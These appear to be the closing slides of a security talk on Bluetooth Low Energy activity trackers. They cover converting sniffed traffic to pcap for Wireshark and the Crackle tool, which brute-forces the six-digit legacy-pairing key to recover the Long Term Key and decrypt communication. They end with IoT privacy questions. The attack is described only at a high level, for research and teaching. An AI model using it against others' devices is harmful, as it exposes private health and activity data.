• Downloadable from https://github.com/joswr1ght/tibtle2pcap
• python tibtle2pcap.py fitbit.psd output.pcap
• wireshark output.pcap
Crackle – Tool for cracking BLE pairing keys
• Cracks the BLE (legacy pairing) key exchange
• Exploits a flaw in the pairing mechanism: the Temporary Key (TK) is at most a six-digit number, so it can be brute-forced from the sniffed pairing exchange
• Brute-forces the TK and derives all further keys from it
• Can even obtain the Long Term Key (LTK)
• Decrypts the entire communication
Discussion
• Privacy issues ?
• How can an activity tracker be better designed ?
Conclusion
• Thoughts on IoT
• Security and privacy concerns brought by IoT
• Next-gen malware
Questions?
Email : [email protected] & [email protected]